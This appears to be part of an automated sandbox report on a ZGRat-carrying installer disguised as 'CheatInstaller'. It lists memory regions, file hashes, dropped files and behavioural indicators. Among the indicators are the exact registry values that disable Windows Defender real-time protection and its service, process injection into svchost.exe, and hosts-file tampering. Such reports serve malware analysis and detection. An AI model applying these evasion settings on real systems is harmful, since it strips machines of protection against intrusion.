memory/2104-4078-0x0000000008F90000-0x0000000009022000-memory.dmp

memory/2104-4081-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/2104-4082-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/2104-4083-0x0000000009030000-0x000000000903A000-memory.dmp

memory/1000-4084-0x000001B5EF0C0000-0x000001B5EF0D0000-memory.dmp

memory/1000-4107-0x000001B5EF0C0000-0x000001B5EF0D0000-memory.dmp

memory/1000-4110-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/3028-4114-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/3028-4116-0x000001FB13090000-0x000001FB130A0000-memory.dmp

memory/3028-4117-0x000001FB13090000-0x000001FB130A0000-memory.dmp

memory/3028-4132-0x000001FB13090000-0x000001FB130A0000-memory.dmp

memory/3028-4159-0x000001FB13090000-0x000001FB130A0000-memory.dmp

memory/3028-4162-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/4720-4166-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/4720-4169-0x0000025668FD0000-0x0000025668FE0000-memory.dmp

memory/4720-4168-0x0000025668FD0000-0x0000025668FE0000-memory.dmp

memory/2104-4184-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/4720-4185-0x0000025668FD0000-0x0000025668FE0000-memory.dmp

memory/2104-4208-0x00000000010B0000-0x00000000010C0000-memory.dmp

memory/4720-4209-0x0000025668FD0000-0x0000025668FE0000-memory.dmp

memory/4720-4212-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/1960-4224-0x00007FF90FA80000-0x00007FF91046C000-memory.dmp

memory/1960-4229-0x000001C4EAFB0000-0x000001C4EAFC0000-memory.dmp

C:\Windows\Installer\MSI3D65.tmp

MD5 8d49691d4ab2fa3cd8c679c0df30c1a1
SHA1 71b8b4619a2b0632920f84f740e7b27af62a921e
SHA256 8412dc56077a9219c7cd04e0fccc2391eb62e32a86ad27e58b24d83c8e8227a5
SHA512 128b1544a4a2fde1eebeaddb2b75a122f7c29f79ad47b7bc648198fdd06047ffedd9601a4bc7808ef51153005986a0fdfb0a06409c23411d13b299bda64aa9f5

C:\Windows\Installer\MSI3D76.tmp

MD5 ce5552c3b309a5f507b31c0af0c0cabf
SHA1 5a5a35ea887677e411ea5ea86dd6881d62db6edf
SHA256 3c2dc5ba528d5c31cefacc19f693b35512eb7d500511b0dbc79762d3f5f7842c
SHA512 4234ee20b71d6f0bed70179344c830be3b18ff53c3652c559f2bc2cd2b7dae142761a8ba77ef2102ac87351ccbb83ee50c855259dd0d7178a75b4412dc5b2389

C:\Windows\Installer\MSI3E23.tmp

MD5 18db7a45912d1664716efdf6e311f5f1
SHA1 24a5d1d2addf8095e6f5e4040a2e1c44956bb141
SHA256 5ffa59b2cb0995af80de9ce944bb3e2933c42cea0d764c0af137ff842dc7fd0c
SHA512 5bc3db53b113d9098170eac6ac1fd2327e6e02f6e5e5e6a5c48e861e1ff683fd2a88928638a0f046a8b89488d6ce1f9eba9952aa34b5ab0858f671b890f250ff

C:\Config.Msi\e57f724.rbs

MD5 31d851fdd65d7164812bd719fcb59b95
SHA1 967a56f5b661101e4dafb6ce1226df4a27d1a846
SHA256 7c4f1f4ef660b7d40ae25ee38b63e3ceb21b62cef122803f8a8cc5eb95bd877a
SHA512 82944e9885b16771601cf2361058c33029009aed2de9f52740c098a3ca383665daa8368291a385d5d1789fbb6b7d550f987f1f43ec256761ba0c90ac2daf983b

C:\Users\Admin\AppData\Local\Temp\7zSB381.tmp\mock-globals\.gitignore

MD5 8da13f306c8c0f4f4a32960e93725b42
SHA1 b9ee3f4a8b64284a8f698206993e4ec2cf83f66f
SHA256 ca7a3d5544beb40beb598f6ae22527e8cbcbc29b67f241ad9e572a50a89848b0
SHA512 59e6493139d8a3af2889fb337032f41124a53f5ca7ee06906c97d4f6cf0fa942f28b3b7ce2d449b10ea0a01a39282397984ea46df43571d2a5fe753fc20bb6cc

memory/4908-4404-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/4908-4406-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/4908-4415-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/4908-4424-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/1988-4429-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4430-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1160-4427-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4432-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4437-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4439-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4444-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4446-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4451-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4453-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4458-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4460-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4464-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4468-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4470-0x0000000005320000-0x0000000005590000-memory.dmp

memory/4908-4463-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/1160-4477-0x0000000005320000-0x0000000005590000-memory.dmp

memory/4908-4478-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/1160-4484-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4483-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1988-4475-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/4908-4449-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/1988-4491-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4490-0x0000000005320000-0x0000000005590000-memory.dmp

memory/4908-4435-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/4908-4492-0x0000020E1F5A0000-0x0000020E1FCDB000-memory.dmp

memory/1988-4498-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4503-0x0000000005320000-0x0000000005590000-memory.dmp

memory/1988-4504-0x00000000053A0000-0x000000000561F000-memory.dmp

memory/1160-4497-0x0000000005320000-0x0000000005590000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-03-18 14:42

Reported

2024-03-18 14:48

Platform

win10v2004-20240226-en

Max time kernel

298s

Max time network

297s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

ZGRat

rat zgrat

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\MSIA5F4.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Windows\Installer\MSIDAE3.tmp N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\Install_YTTCHTs.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3472 set thread context of 6424 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe
PID 6424 set thread context of 540 N/A C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe C:\Windows\System32\svchost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI703B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e575edd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6430.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI63E0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI70C9.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7273.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA604.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6E54.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7158.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDAE3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5FB5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7262.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDB13.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6401.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI705B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6E44.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6FFB.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA259.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e575ed9.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI5F75.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6043.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6074.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6064.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7128.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA5F4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDAD1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIDAD2.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e575ed9.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI6023.tmp C:\Windows\system32\msiexec.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\22\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
